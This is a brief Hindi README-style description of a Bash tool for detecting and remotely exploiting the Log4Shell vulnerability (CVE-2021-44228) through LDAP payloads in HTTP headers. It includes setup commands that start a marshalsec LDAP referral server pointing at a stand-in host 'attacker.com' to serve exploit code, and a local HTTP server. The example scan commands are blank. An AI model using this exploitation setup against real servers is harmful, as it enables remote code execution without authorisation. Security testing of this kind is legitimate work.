
बैश स्क्रिप्ट जो Log4j भेद्यता CVE-2021-44228 की पहचान दूरस्थ रूप से करने की अनुमति देती है।
बैश स्क्रिप्ट जो Log4shell कमजोरी की पहचान और/या दूरस्थ रूप से शोषण करने की अनुमति देती है। यह उपकरण LDAP पेलोड और X-Api-Version, User-Agent तथा X-Forwarded-For हेडर का उपयोग करके विभिन्न परीक्षण करता है।
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
हम एक HTTP सर्वर सक्षम करते हैं python3 -m http.server 8080
Java इंस्टॉल होना चाहिए #sudo apt install default-jre
Curl इंस्टॉल होना चाहिए #sudo apt-get install curl
निम्नलिखित पैरामीटर दर्ज करें:
#इंटरनल नेटवर्क पर एप्लिकेशन स्कैनिंग का उदाहरण:

#इंटरनेट पर एप्लिकेशन स्कैनिंग का उदाहरण:
